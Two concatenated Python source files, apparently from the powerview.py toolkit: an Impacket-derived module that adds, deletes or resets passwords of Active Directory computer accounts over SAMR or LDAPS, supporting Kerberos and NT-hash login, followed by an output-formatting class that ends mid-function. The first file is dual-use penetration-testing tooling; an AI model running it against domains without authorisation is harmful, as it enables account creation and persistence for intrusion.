#!/usr/bin/env python
# Impacket - Collection of Python classes for working with network protocols.
#
# SECUREAUTH LABS. Copyright (C) 2022 SecureAuth Corporation. All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Description:
#   This script will add a computer account to the domain and set its password.
#   Allows to use SAMR over SMB (this way is used by modern Windows computer when
#   adding machines through the GUI) and LDAPS.
#   Plain LDAP is not supported, as it doesn't allow setting the password.
#
# Author:
#   JaGoTu (@jagotu)
#
# Reference for:
#   SMB, SAMR, LDAP
#
# ToDo:
#   [ ]: Complete the process of joining a client computer to a domain via the SAMR protocol
#

from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals

from impacket import version
from impacket.examples import logger
from impacket.examples.utils import parse_credentials
from impacket.dcerpc.v5 import samr, epm, transport
from impacket.spnego import SPNEGO_NegTokenInit, TypesMech

import ldap3
import argparse
import logging
import sys
import string
import random
import ssl
from binascii import unhexlify

from powerview.utils.helpers import is_valid_dn

class ADDCOMPUTER:
    def __init__(self, username=None, password=None, domain=None, cmdLineOptions=None, computer_name=None, computer_pass=None, base_dn=None, ldap_session=None):
        self.options = cmdLineOptions
        self.__username = username
        self.__password = password
        self.__domain = domain
        self.__lmhash = ''
        self.__nthash = ''
        self.__hashes = cmdLineOptions.hashes
        self.__aesKey = cmdLineOptions.auth_aes_key
        self.__doKerberos = cmdLineOptions.use_kerberos
        self.__TGT = cmdLineOptions.TGT
        self.__TGS = cmdLineOptions.TGS
        self.__target = cmdLineOptions.dc_host
        self.__kdcHost = cmdLineOptions.dc_ip
        self.__computerName = computer_name
        self.__computerPassword = computer_pass
        self.__method = cmdLineOptions.method
        self.__port = None
        self.__domainNetbios = None
        self.__noAdd = False
        self.__delete = cmdLineOptions.delete
        self.__targetIp = cmdLineOptions.dc_ip
        self.__baseDN = None
        self.__computerGroup = None
        self.__ldapSession = ldap_session
        if self.__targetIp is not None:
            self.__kdcHost = self.__targetIp

        if self.__method not in ['SAMR', 'LDAPS']:
            raise ValueError("Unsupported method %s" % self.__method)

        if self.__doKerberos and cmdLineOptions.dc_host is None:
            raise ValueError("Kerberos auth requires DNS name of the target DC. Use -dc-host.")

        if self.__method == 'LDAPS' and not '.' in self.__domain:
                logging.warning('\'%s\' doesn\'t look like a FQDN. Generating baseDN will probably fail.' % self.__domain)

        if cmdLineOptions.hashes is not None:
            self.__lmhash, self.__nthash = cmdLineOptions.hashes.split(':')

        if self.__computerName is None:
            if self.__noAdd:
                raise ValueError("You have to provide a computer name when using -no-add.")
            elif self.__delete:
                raise ValueError("You have to provide a computer name when using -delete.")
        else:
            if self.__computerName[-1] != '$' and not is_valid_dn(self.__computerName):
                self.__computerName += '$'

        if self.__computerPassword is None:
            self.__computerPassword = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(32))

        if self.__target is None:
            if not '.' in self.__domain:
                logging.warning('No DC host set and \'%s\' doesn\'t look like a FQDN. DNS resolution of short names will probably fail.' % self.__domain)
            self.__target = self.__domain

        if self.__port is None:
            if self.__method == 'SAMR':
                self.__port = 445
            elif self.__method == 'LDAPS':
                self.__port = 636

        if self.__domainNetbios is None:
            self.__domainNetbios = self.__domain

        self.__baseDN = base_dn
        self.__computerGroup = self.__baseDN

    def run_samr(self):
        if self.__targetIp is not None:
            stringBinding = epm.hept_map(self.__targetIp, samr.MSRPC_UUID_SAMR, protocol = 'ncacn_np')
        else:
            stringBinding = epm.hept_map(self.__target, samr.MSRPC_UUID_SAMR, protocol = 'ncacn_np')
        rpctransport = transport.DCERPCTransportFactory(stringBinding)
        rpctransport.set_dport(self.__port)

        if self.__targetIp is not None:
            rpctransport.setRemoteHost(self.__targetIp)
            rpctransport.setRemoteName(self.__target)

        if hasattr(rpctransport, 'set_credentials'):
            # This method exists only for selected protocol sequences.
            rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash,
                                         self.__nthash, self.__aesKey, TGT=self.__TGT, TGS=self.__TGS)

        rpctransport.set_kerberos(self.__doKerberos, self.__kdcHost)
        self.doSAMRAdd(rpctransport)

    def run_ldaps(self):
        if not self.__ldapSession:
            raise Exception("No ldap_session. Exiting")
        
        ldapConn = self.__ldapSession

        if self.__noAdd or self.__delete:
            if not self.LDAPComputerExists(ldapConn, self.__computerName):
                raise Exception("Account %s not found in %s!" % (self.__computerName, self.__baseDN))

            computer = self.LDAPGetComputer(ldapConn, self.__computerName)

            if self.__delete:
                res = ldapConn.delete(computer.entry_dn)
                message = "delete"
            else:
                res = ldapConn.modify(computer.entry_dn, {'unicodePwd': [(ldap3.MODIFY_REPLACE, ['"{}"'.format(self.__computerPassword).encode('utf-16-le')])]})
                message = "set password for"


            if not res:
                if ldapConn.result['result'] == ldap3.core.results.RESULT_INSUFFICIENT_ACCESS_RIGHTS:
                    raise Exception("User %s doesn't have right to %s %s!" % (self.__username, message, self.__computerName))
                else:
                    raise Exception(str(ldapConn.result))
            else:
                if self.__noAdd:
                    logging.info("Succesfully set password of %s to %s." % (self.__computerName, self.__computerPassword))
                else:
                    logging.info("Succesfully deleted %s." % self.__computerName)

        else:
            if self.__computerName is not None:
                if self.LDAPComputerExists(ldapConn, self.__computerName):
                    raise Exception("Account %s already exists! If you just want to set a password, use -no-add." % self.__computerName)
            else:
                while True:
                    self.__computerName = self.generateComputerName()
                    if not self.LDAPComputerExists(ldapConn, self.__computerName):
                        break


            computerHostname = self.__computerName[:-1]
            computerDn = ('CN=%s,%s' % (computerHostname, self.__computerGroup))

            # Default computer SPNs
            spns = [
                'HOST/%s' % computerHostname,
                'HOST/%s.%s' % (computerHostname, self.__domain),
                'RestrictedKrbHost/%s' % computerHostname,
                'RestrictedKrbHost/%s.%s' % (computerHostname, self.__domain),
            ]
            ucd = {
                'dnsHostName': '%s.%s' % (computerHostname, self.__domain),
                'userAccountControl': 0x1000,
                'servicePrincipalName': spns,
                'sAMAccountName': self.__computerName,
                'unicodePwd': ('"%s"' % self.__computerPassword).encode('utf-16-le')
            }

            res = ldapConn.add(computerDn, ['top','person','organizationalPerson','user','computer'], ucd)
            if not res:
                if ldapConn.result['result'] == ldap3.core.results.RESULT_UNWILLING_TO_PERFORM:
                    error_code = int(ldapConn.result['message'].split(':')[0].strip(), 16)
                    if error_code == 0x216D:
                        raise Exception("User %s machine quota exceeded!" % self.__username)
                    else:
                        raise Exception(str(ldapConn.result))
                elif ldapConn.result['result'] == ldap3.core.results.RESULT_INSUFFICIENT_ACCESS_RIGHTS:
                    raise Exception("User %s doesn't have right to create a machine account!" % self.__username)
                else:
                    raise Exception(str(ldapConn.result))
            else:
                logging.info("Successfully added machine account %s with password %s." % (self.__computerName, self.__computerPassword))

    def LDAPComputerExists(self, connection, computerName):
        connection.search(self.__baseDN, '(|(sAMAccountName={computerName})(distinguishedName={computerName}))'.format(computerName=computerName))
        return len(connection.entries) ==1

    def LDAPGetComputer(self, connection, computerName):
        connection.search(self.__baseDN, '(|(sAMAccountName={computerName})(distinguishedName={computerName}))'.format(computerName=computerName))
        return connection.entries[0]

    def LDAP3KerberosLogin(self, connection, user, password, domain='', lmhash='', nthash='', aesKey='', kdcHost=None, TGT=None,
                      TGS=None, useCache=True):
        from pyasn1.codec.ber import encoder, decoder
        from pyasn1.type.univ import noValue
        """
        logins into the target system explicitly using Kerberos. Hashes are used if RC4_HMAC is supported.

        :param string user: username
        :param string password: password for the user
        :param string domain: domain where the account is valid for (required)
        :param string lmhash: LMHASH used to authenticate using hashes (password is not used)
        :param string nthash: NTHASH used to authenticate using hashes (password is not used)
        :param string aesKey: aes256-cts-hmac-sha1-96 or aes128-cts-hmac-sha1-96 used for Kerberos authentication
        :param string kdcHost: hostname or IP Address for the KDC. If None, the domain will be used (it needs to resolve tho)
        :param struct TGT: If there's a TGT available, send the structure here and it will be used
        :param struct TGS: same for TGS. See smb3.py for the format
        :param bool useCache: whether or not we should use the ccache for credentials lookup. If TGT or TGS are specified this is False

        :return: True, raises an Exception if error.
        """

        if lmhash != '' or nthash != '':
            if len(lmhash) % 2:
                lmhash = '0' + lmhash
            if len(nthash) % 2:
                nthash = '0' + nthash
            try:  # just in case they were converted already
                lmhash = unhexlify(lmhash)
                nthash = unhexlify(nthash)
            except TypeError:
                pass

        # Importing down here so pyasn1 is not required if kerberos is not used.
        from impacket.krb5.ccache import CCache
        from impacket.krb5.asn1 import AP_REQ, Authenticator, TGS_REP, seq_set
        from impacket.krb5 import constants
        from impacket.krb5.types import Principal, KerberosTime, Ticket
        import datetime

        from impacket.krb5.kerberosv5 import getKerberosTGT, getKerberosTGS

        if TGT is not None or TGS is not None:
            useCache = False

        targetName = 'ldap/%s' % self.__target
        if useCache:
            domain, user, TGT, TGS = CCache.parseFile(domain, user, targetName)

        # First of all, we need to get a TGT for the user
        userName = Principal(user, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
        if TGT is None:
            if TGS is None:
                tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, password, domain, lmhash, nthash,
                                                                        aesKey, kdcHost)
        else:
            tgt = TGT['KDC_REP']
            cipher = TGT['cipher']
            sessionKey = TGT['sessionKey']

        if TGS is None:
            serverName = Principal(targetName, type=constants.PrincipalNameType.NT_SRV_INST.value)
            tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(serverName, domain, kdcHost, tgt, cipher,
                                                                    sessionKey)
        else:
            tgs = TGS['KDC_REP']
            cipher = TGS['cipher']
            sessionKey = TGS['sessionKey']

            # Let's build a NegTokenInit with a Kerberos REQ_AP

        blob = SPNEGO_NegTokenInit()

        # Kerberos
        blob['MechTypes'] = [TypesMech['MS KRB5 - Microsoft Kerberos 5']]

        # Let's extract the ticket from the TGS
        tgs = decoder.decode(tgs, asn1Spec=TGS_REP())[0]
        ticket = Ticket()
        ticket.from_asn1(tgs['ticket'])

        # Now let's build the AP_REQ
        apReq = AP_REQ()
        apReq['pvno'] = 5
        apReq['msg-type'] = int(constants.ApplicationTagNumbers.AP_REQ.value)

        opts = []
        apReq['ap-options'] = constants.encodeFlags(opts)
        seq_set(apReq, 'ticket', ticket.to_asn1)

        authenticator = Authenticator()
        authenticator['authenticator-vno'] = 5
        authenticator['crealm'] = domain
        seq_set(authenticator, 'cname', userName.components_to_asn1)
        now = datetime.datetime.utcnow()

        authenticator['cusec'] = now.microsecond
        authenticator['ctime'] = KerberosTime.to_asn1(now)

        encodedAuthenticator = encoder.encode(authenticator)

        # Key Usage 11
        # AP-REQ Authenticator (includes application authenticator
        # subkey), encrypted with the application session key
        # (Section 5.5.1)
        encryptedEncodedAuthenticator = cipher.encrypt(sessionKey, 11, encodedAuthenticator, None)

        apReq['authenticator'] = noValue
        apReq['authenticator']['etype'] = cipher.enctype
        apReq['authenticator']['cipher'] = encryptedEncodedAuthenticator

        blob['MechToken'] = encoder.encode(apReq)


        request = ldap3.operation.bind.bind_operation(connection.version, ldap3.SASL, user, None, 'GSS-SPNEGO', blob.getData())

        # Done with the Kerberos saga, now let's get into LDAP
        # try to open connection if closed
        if connection.closed:
            connection.open(read_server_info=False)

        connection.sasl_in_progress = True
        response = connection.post_send_single_response(connection.send('bindRequest', request, None))
        connection.sasl_in_progress = False
        if response[0]['result'] != 0:
            raise Exception(response)

        connection.bound = True

        return True

    def generateComputerName(self):
        return 'DESKTOP-' + (''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(8)) + '$')

    def doSAMRAdd(self, rpctransport):
        dce = rpctransport.get_dce_rpc()
        servHandle = None
        domainHandle = None
        userHandle = None
        try:
            dce.connect()
            dce.bind(samr.MSRPC_UUID_SAMR)

            samrConnectResponse = samr.hSamrConnect5(dce, '\\\\%s\x00' % self.__target,
                samr.SAM_SERVER_ENUMERATE_DOMAINS | samr.SAM_SERVER_LOOKUP_DOMAIN )
            servHandle = samrConnectResponse['ServerHandle']

            samrEnumResponse = samr.hSamrEnumerateDomainsInSamServer(dce, servHandle)
            domains = samrEnumResponse['Buffer']['Buffer']
            domainsWithoutBuiltin = list(filter(lambda x : x['Name'].lower() != 'builtin', domains))

            if len(domainsWithoutBuiltin) > 1:
                domain = list(filter(lambda x : x['Name'].lower() == self.__domainNetbios, domains))
                if len(domain) != 1:
                    logging.critical("This server provides multiple domains and '%s' isn't one of them.", self.__domainNetbios)
                    logging.critical("Available domain(s):")
                    for domain in domains:
                        logging.error(" * %s" % domain['Name'])
                    logging.critical("Consider using -domain-netbios argument to specify which one you meant.")
                    raise Exception()
                else:
                    selectedDomain = domain[0]['Name']
            else:
                selectedDomain = domainsWithoutBuiltin[0]['Name']

            samrLookupDomainResponse = samr.hSamrLookupDomainInSamServer(dce, servHandle, selectedDomain)
            domainSID = samrLookupDomainResponse['DomainId']

            if logging.getLogger().level == logging.DEBUG:
                logging.info("Opening domain %s..." % selectedDomain)
            samrOpenDomainResponse = samr.hSamrOpenDomain(dce, servHandle, samr.DOMAIN_LOOKUP | samr.DOMAIN_CREATE_USER , domainSID)
            domainHandle = samrOpenDomainResponse['DomainHandle']


            if self.__noAdd or self.__delete:
                try:
                    checkForUser = samr.hSamrLookupNamesInDomain(dce, domainHandle, [self.__computerName])
                except samr.DCERPCSessionError as e:
                    if e.error_code == 0xc0000073:
                        if self.options.stack_trace:           
                            raise 
                        else:
                            logging.error('Account %s not found in domain %s!' % (self.__computerName, selectedDomain))
                            return
                    else:
                        if self.options.stack_trace:
                            raise 
                        else:
                            logging.error('Error: Please use --stack-trace to see the full error.')
                            return

                userRID = checkForUser['RelativeIds']['Element'][0]
                if self.__delete:
                    access = samr.DELETE
                    message = "delete"
                else:
                    access = samr.USER_FORCE_PASSWORD_CHANGE
                    message = "set password for"
                try:
                    openUser = samr.hSamrOpenUser(dce, domainHandle, access, userRID)
                    userHandle = openUser['UserHandle']
                except samr.DCERPCSessionError as e:
                    if e.error_code == 0xc0000022:
                        if self.options.stack_trace:
                            logging.error('User %s doesn\'t have right to %s %s!' % (self.__username, message, self.__computerName))
                            raise 
                        else:
                            logging.error('User %s doesn\'t have right to %s %s!' % (self.__username, message, self.__computerName))
                            return
                    else:
                        if self.options.stack_trace:
                            raise 
                        else:
                            logging.error('Error: Please use --stack-trace to see the full error.')
                            return
            else:
                if self.__computerName is not None:
                    try:
                        checkForUser = samr.hSamrLookupNamesInDomain(dce, domainHandle, [self.__computerName])
                        raise Exception("Account %s already exists! If you just want to set a password, use -no-add." % self.__computerName)
                    except samr.DCERPCSessionError as e:
                        if e.error_code != 0xc0000073:
                            if self.options.stack_trace:
                                raise
                            else:
                                logging.error('Error: Please use --stack-trace to see the full error.')
                                return
                else:
                    foundUnused = False
                    while not foundUnused:
                        self.__computerName = self.generateComputerName()
                        try:
                            checkForUser = samr.hSamrLookupNamesInDomain(dce, domainHandle, [self.__computerName])
                        except samr.DCERPCSessionError as e:
                            if e.error_code == 0xc0000073:
                                foundUnused = True
                            else:
                                if self.options.stack_trace:
                                    raise
                                else:
                                    logging.error('Error: Please use --stack-trace to see the full error.')
                                    return

                try:
                    createUser = samr.hSamrCreateUser2InDomain(dce, domainHandle, self.__computerName, samr.USER_WORKSTATION_TRUST_ACCOUNT, samr.USER_FORCE_PASSWORD_CHANGE,)
                except samr.DCERPCSessionError as e:
                    if e.error_code == 0xc0000022:
                        if self.options.stack_trace:
                            raise 
                        else:
                            logging.error('User %s doesn\'t have right to create a machine account!' % self.__username)
                            return
                    elif e.error_code == 0xc00002e7:
                        if self.options.stack_trace:
                            raise 
                        else:
                            logging.error('User %s machine quota exceeded!' % self.__username)
                            return
                    else:
                        raise

                userHandle = createUser['UserHandle']

            if self.__delete:
                samr.hSamrDeleteUser(dce, userHandle)
                logging.info("Successfully deleted %s." % self.__computerName)
                userHandle = None
            else:
                samr.hSamrSetPasswordInternal4New(dce, userHandle, self.__computerPassword)
                if self.__noAdd:
                    logging.info("Successfully set password of %s to %s." % (self.__computerName, self.__computerPassword))
                else:
                    checkForUser = samr.hSamrLookupNamesInDomain(dce, domainHandle, [self.__computerName])
                    userRID = checkForUser['RelativeIds']['Element'][0]
                    openUser = samr.hSamrOpenUser(dce, domainHandle, samr.MAXIMUM_ALLOWED, userRID)
                    userHandle = openUser['UserHandle']
                    req = samr.SAMPR_USER_INFO_BUFFER()
                    req['tag'] = samr.USER_INFORMATION_CLASS.UserControlInformation
                    req['Control']['UserAccountControl'] = samr.USER_WORKSTATION_TRUST_ACCOUNT
                    samr.hSamrSetInformationUser2(dce, userHandle, req)
                    logging.info("Successfully added machine account %s with password %s." % (self.__computerName, self.__computerPassword))

        except Exception as e:
            if logging.getLogger().level == logging.DEBUG:
                import traceback
                traceback.print_exc()

            logging.critical(str(e))
        finally:
            if userHandle is not None:
                samr.hSamrCloseHandle(dce, userHandle)
            if domainHandle is not None:
                samr.hSamrCloseHandle(dce, domainHandle)
            if servHandle is not None:
                samr.hSamrCloseHandle(dce, servHandle)
            dce.disconnect()



#!/usr/bin/env python3
from powerview.utils.colors import bcolors
from powerview.lib.resolver import (
    UAC,
    ENCRYPTION_TYPE,
    LDAP
)
from powerview import PowerView as PV
from powerview.utils.logging import LOG
from powerview.utils.helpers import IDict
from powerview.utils.constants import TABLE_FMT_MAP

import ldap3
import json
import re
import logging
import base64
import datetime
from tabulate import tabulate as table
from io import StringIO
import csv

class FORMATTER:
    def __init__(self, pv_args, use_kerberos=False, config=None):
        self.__newline = '\n'
        self.args = pv_args
        self.use_kerberos = use_kerberos
        
        # Default configuration
        self.config = {
            'wrap_length': 100,            # Text wrap length for large values
            'attr_spacing': 28,            # Default attribute name spacing
            'max_entries': 1000,           # Maximum entries before pagination
            'date_format': '%m/%d/%Y %H:%M:%S %p',  # Format for datetime values
            'binary_format': 'base64',     # Format for binary data (base64, hex)
            'padding': 5,                  # Extra padding for attribute names
            'nested_indent': 3,            # Indentation for nested values
            'max_list_items': 100,         # Maximum items to show in lists
            'table_format': 'simple',      # Default table format
            'csv_quote_all': True,         # Quote all CSV fields
            'show_empty_values': False,    # Show attributes with empty values
            'truncate_long_values': True,  # Truncate very long values
            'max_value_length': 1000       # Maximum value length before truncation
        }
        
        # Override with user config if provided
        if config:
            self.config.update(config)
            
        # Initialize format cache
        self._format_cache = {}
        self.last_results_from_cache = False

    def count(self, entries):
        print(len(entries))

    def print_table(self, entries: list, headers: list, align: str = None):
        # Use config value with fallback to args
        table_format = self.args.tableview if hasattr(self.args, 'tableview') else self.config['table_format']
        table_format = TABLE_FMT_MAP.get(table_format, "simple")
        
        filtered_entries = [entry for entry in entries if not all(e == '' for e in entry)]
        print()
        if table_format == "csv":
            output = StringIO()
            csv_writer = csv.writer(output, quoting=csv.QUOTE_ALL if self.config['csv_quote_all'] else csv.QUOTE_MINIMAL)
            if headers:
                csv_writer.writerow(headers)
            csv_writer.writerows(filtered_entries)
            table_res = output.getvalue()
            output.close()
        else:
            table_res = table(
                filtered_entries,
                headers,
                numalign="left" if not align else align,
                tablefmt=table_format
            )
        if self.args.outfile:
            LOG.write_to_file(self.args.outfile, table_res)
        print(table_res)
        print()

    def print_index(self, entries):
        i = self.args.select
        for entry in entries[0:i]:
            if isinstance(entry,ldap3.abstract.entry.Entry) or isinstance(entry['attributes'], dict) or isinstance(entry['attributes'], ldap3.utils.ciDict.CaseInsensitiveDict):
                if isinstance(entry, ldap3.abstract.entry.Entry):
                    entry = json.loads(entry.entry_to_json())
                entry = self.resolve_values(entry)
                for attr,value in entry['attributes'].items():
                    # Check dictionary in a list
                    if isinstance(value, list):
                        for i in value:
                            if (isinstance(i,dict)) and ("encoded" in i.keys()):
                                value = str(i["encoded"])
                            if isinstance(i,int):
                                value = str(i)

                    value = self.beautify(value, self.get_max_len(list(entry['attributes'].keys())) + 2)
                    if isinstance(value,list):
                        if len(value) != 0:
                            value = self.clean_value(value)

                            _stdout = f"{attr.ljust(self.get_max_len(list(entry['attributes'].keys())))}: {f'''{self.__newline.ljust(self.get_max_len(list(entry['attributes'].keys()))+3)}'''.join(value)}"
                            if self.args.outfile:
                                LOG.write_to_file(self.args.outfile, _stdout)
                            print(_stdout)
                    else:
                        _stdout = f"{attr.ljust(self.get_max_len(list(entry['attributes'].keys())))}: {value}"
                        if self.args.outfile:
                            LOG.write_to_file(self.args.outfile, _stdout)
                        print(_stdout)
                if self.args.outfile:
                    LOG.write_to_file(self.args.outfile, "")
                print()
            elif isinstance(entry['attributes'],list):
                entry = self.resolve_values(entry)
                for ace in entry['attributes'][0:i]:
                    for attr, value in ace.items():
                        _stdout = f"{attr.ljust(self.config['attr_spacing'])}: {value}"
                        if self.args.outfile:
                            LOG.write_to_file(self.args.outfile, _stdout)
                        print(_stdout)
                    if self.args.outfile:
                        LOG.write_to_file(self.args.outfile, "")
                    print()

    def print_select(self,entries):
        select_attributes = self.args.select
        for entry in entries:
            if isinstance(entry,ldap3.abstract.entry.Entry) or isinstance(entry['attributes'], dict) or isinstance(entry['attributes'], ldap3.utils.ciDict.CaseInsensitiveDict):
                if isinstance(entry, ldap3.abstract.entry.Entry):
                    entry = json.loads(entry.entry_to_json())
                entry = self.resolve_values(entry)
                for key in list(entry["attributes"].keys()):
                    for attr in select_attributes:
                        if (str(attr).casefold() == str(key).casefold()):
                            value = ""
                            # Check dictionary in a list
                            if isinstance(entry['attributes'][key], list):
                                entry['attributes'][key] = self.clean_value(entry['attributes'][key])
                                for i in entry['attributes'][key]:
                                    if (isinstance(i,dict)) and ("encoded" in i.keys()):
                                        value = str(i["encoded"])
                                    else:
                                        if len(select_attributes) == 1:
                                            value += str(i)+"\n"
                                        else:
                                            value += str(i)+"\n"+''.ljust(self.get_max_len(select_attributes)+2)
                            else:
                                value = str(entry['attributes'][key])
                            value = value.strip()
                            if len(value) != 0 or self.config['show_empty_values']:
                                if len(select_attributes) == 1:
                                    if self.args.outfile:
                                        LOG.write_to_file(self.args.outfile, value)
                                    print(value)
                                else:
                                    _stdout = f"{key.ljust(self.get_max_len(select_attributes))}: {value}"
                                    if self.args.outfile:
                                        LOG.write_to_file(self.args.outfile, _stdout)
                                    print(_stdout)
                if len(select_attributes) != 1:
                    if self.args.outfile:
                        LOG.write_to_file(self.args.outfile, "")
                    print()
            elif isinstance(entry['attributes'], list):
                entry = self.resolve_values(entry)
                for ace in entry['attributes']:
                    for key in list(ace.keys()):
                        for attr in select_attributes:
                            if str(attr).casefold() == str(key).casefold():
                                if len(select_attributes) == 1:
                                    if self.args.outfile:
                                        LOG.write_to_file(self.args.outfile, ace[key])
                                    print(ace[key])
                                else:
                                    _stdout = f"{key.ljust(self.config['attr_spacing'])}: {ace[key]}"
                                    if self.args.outfile:
                                        LOG.write_to_file(self.args.outfile, _stdout)
                                    print(_stdout)
                    if len(select_attributes) != 1:
                        if self.args.outfile:
                            LOG.write_to_file(self.args.outfile, "")
                        print()

    def table_view(self, entries):
        # Check if results are from cache
        self.last_results_from_cache = False
        if entries and len(entries) > 0:
            # Check first entry for cache status
            first_entry = entries[0]
            if isinstance(first_entry, dict) and first_entry.get('from_cache', False):
                self.last_results_from_cache = True
            
        # Display cache notification if results are from cache
        if self.last_results_from_cache:
            cache_msg = "[Formatter] Results from cache. Use 'Clear-Cache' or '-NoCache' to refresh."
            logging.warning(cache_msg)
        
        headers = []
        rows = []
        nested_list = False
        if (hasattr(self.args, "select") and self.args.select) or (hasattr(self.args, "properties") and self.args.properties and not self.args.properties == '*'):
            if self.args.select:
                headers = self.args.select
            elif self.args.properties:
                headers = self.args.properties
        else:
            if isinstance(entries[0]["attributes"], dict) or isinstance(entries[0]["attributes"], ldap3.utils.ciDict.CaseInsensitiveDict):
                headers = entries[0]["attributes"].keys()
            elif isinstance(entries[0]["attributes"], list):
                headers = entries[0]["attributes"][0].keys()
                nested_list = True

        if isinstance(entries[0]["attributes"], list):
            for entry in entries:
                for ent in entry["attributes"]:
                    row = []
                    for head in headers:
                        val = IDict(ent).get(head) # IDict give get() with case-insensitive capabilities :)
                        val = self.format_value_by_type(val)
                        row.append(val)
                    rows.append(row)
        else:
            for entry in entries:
                row = []
                for head in headers:
                    val = IDict(entry["attributes"]).get(head) # IDict give get() with case-insensitive capabilities :)
                    val = self.format_value_by_type(val)
                    row.append(val)
                rows.append(row)

        self.print_table(entries=rows, headers=headers)

    def print(self, entries):
        # Add pagination for large result sets
        total_entries = len(entries)
        if hasattr(self.args, 'paginate') and self.args.paginate and total_entries > self.config['max_entries']:
            self._print_paginated(entries)
            return
        
        # Check if results are from cache
        self.last_results_from_cache = False
        if entries and len(entries) > 0:
            first_entry = entries[0]
            if isinstance(first_entry, dict) and first_entry.get('from_cache', False):
                self.last_results_from_cache = True
            
        # Display cache notification if results are from cache
        if self.last_results_from_cache:
            cache_msg = "[Formatter] Results from cache. Use 'Clear-Cache' or '-NoCache' to refresh."
            logging.warning(cache_msg)
        
        for entry in entries:
            have_entry = False
            if isinstance(entry,ldap3.abstract.entry.Entry) or isinstance(entry['attributes'], dict) or isinstance(entry['attributes'], ldap3.utils.ciDict.CaseInsensitiveDict):
                if isinstance(entry, ldap3.abstract.entry.Entry):
                    entry = json.loads(entry.entry_to_json())
                entry = self.resolve_values(entry)
                for attr,value in entry['attributes'].items():
                    # Check dictionary in a list
                    if isinstance(value, list):
                        for i in value:
                            if (isinstance(i,dict)) and ("encoded" in i.keys()):
                                value = str(i["encoded"])
                            if isinstance(i,int):
                                value = str(i)

                    value = self.beautify(value, self.get_max_len(list(entry['attributes'].keys()))+2)

                    if isinstance(value,list):
                        if len(value) != 0 or self.config['show_empty_values']:
                            value = self.clean_value(value)

                            have_entry = True
                            _stdout = f"{attr.ljust(self.get_max_len(list(entry['attributes'].keys())))}: {f'''{self.__newline.ljust(self.get_max_len(list(entry['attributes'].keys()))+3)}'''.join(value)}"
                            if self.args.outfile:
                                LOG.write_to_file(self.args.outfile, _stdout)
                            print(_stdout)
                    else:
                        if str(value).strip() != "" or self.config['show_empty_values']:
                            have_entry = True
                            _stdout = f"{attr.ljust(self.get_max_len(list(entry['attributes'].keys())))}: {str(value)}"
                            if self.args.outfile:
                                LOG.write_to_file(self.args.outfile, _stdout)
                            print(_stdout)
                if have_entry:
                    if self.args.outfile:
                        LOG.write_to_file(self.args.outfile, "")
                    print()
            elif isinstance(entry['attributes'],list):
                entry = self.resolve_values(entry)
                for ace in entry['attributes']:
                    for k, v in ace.items():
                        if str(v).strip() != "" or self.config['show_empty_values']:
                            _stdout = f'{k.ljust(self.config["attr_spacing"])}: {v}'
                            if self.args.outfile:
                                LOG.write_to_file(self.args.outfile, _stdout)
                            print(_stdout)
                    if self.args.outfile:
                        LOG.write_to_file(self.args.outfile, "")
                    print()
            elif isinstance(entry, str):
                entry = self.resolve_values(entry)
                if self.args.outfile:
                    LOG.write_to_file(self.args.outfile, entry)
                print(entry)

    def _print_paginated(self, entries):
        """Print entries with pagination support."""
        # Check if results are from cache
        self.last_results_from_cache = False
        if entries and len(entries) > 0:
            # Check first entry for cache status
            first_entry = entries[0]
            if isinstance(first_entry, dict) and first_entry.get('from_cache', False):
                self.last_results_from_cache = True
            
        # Display cache notification if results are from cache
        if self.last_results_from_cache:
            cache_msg = "[Formatter] Results from cache. Use 'Clear-Cache' or '-NoCache' to refresh."
            logging.warning(cache_msg)
        
        page_size = self.config['max_entries']
        total_pages = (len(entries) + page_size - 1) // page_size
        
        current_page = 1
        while True:
            start_idx = (current_page - 1) * page_size
            end_idx = min(start_idx + page_size, len(entries))
            
            print(f"\n--- Page {current_page}/{total_pages} (Entries {start_idx+1}-{end_idx} of {len(entries)}) ---\n")
            
            # Print current page's entries
            page_entries = entries[start_idx:end_idx]
            for entry in page_entries:
                # Use same logic as print method but for a subset
                have_entry = False
                if isinstance(entry, ldap3.abstract.entry.Entry) or isinstance(entry['attributes'], dict):
                    if isinstance(entry, ldap3.abstract.entry.Entry):
                        entry = json.loads(entry.entry_to_json())
                    entry = self.resolve_values(entry)
                    for attr, value in entry['attributes'].items():
                        value = self.beautify(value, self.get_max_len(list(entry['attributes'].keys()))+2)
                        if isinstance(value, list):
                            if len(value) != 0:
                                value = self.clean_value(value)
                                have_entry = True
                                print(f"{attr.ljust(self.get_max_len(list(entry['attributes'].keys())))}: {f'''{self.__newline.ljust(self.get_max_len(list(entry['attributes'].keys()))+3)}'''.join(value)}")
                        else:
                            have_entry = True
                            print(f"{attr.ljust(self.get_max_len(list(entry['attributes'].keys())))}: {str(value)}")
                    if have_entry:
                        print()
                elif isinstance(entry['attributes'], list):
                    entry = self.resolve_values(entry)
                    for ace in entry['attributes']:
                        for k, v in ace.items():
                            print(f'{k.ljust(self.config["attr_spacing"])}: {v}')
                        print()
            
            if total_pages <= 1:
                break
                
            # Prompt for next action
            action = input("\nEnter 'n' for next page, 'p' for previous page, 'q' to quit pagination: ").lower()
            if action == 'n' and current_page < total_pages:
                current_page += 1
            elif action == 'p' and current_page > 1:
                current_page -= 1
            elif action == 'q':
                break
            else:
                print("Invalid command or page limit reached.")

    def sort_entries(self, entries, sort_option):
        try:
            def sort_key(entry):
                if sort_option.lower() not in [v.lower() for v in entry["attributes"].keys()]:
                    raise Exception("%s key not found" % (sort_option))

                if not isinstance(entry["attributes"], ldap3.utils.ciDict.CaseInsensitiveDict):
                    entry["attributes"] = IDict(entry["attributes"])

                value = entry['attributes'].get(sort_option)
                if isinstance(value, str):
                    return value.lower()
                elif isinstance(value, list):
                    if sort_option.lower() in ["badpasswordtime", "lastlogoff", "lastlogon", "pwdlastset", "lastlogontimestamp"]:
                        return datetime.datetime.min
                    else:
                        return value
                else:
                    logging.warning("Value not compatible for sorting. Skipping...")
                    return value

            sorted_users = sorted(entries, key=sort_key)
            return sorted_users
        except AttributeError:
            logging.warning("Failed to sort. Probably value is not a string. Skipping...")
            return entries
        except KeyError as e:
            raise KeyError("%s key not found" % str(e))
        finally:
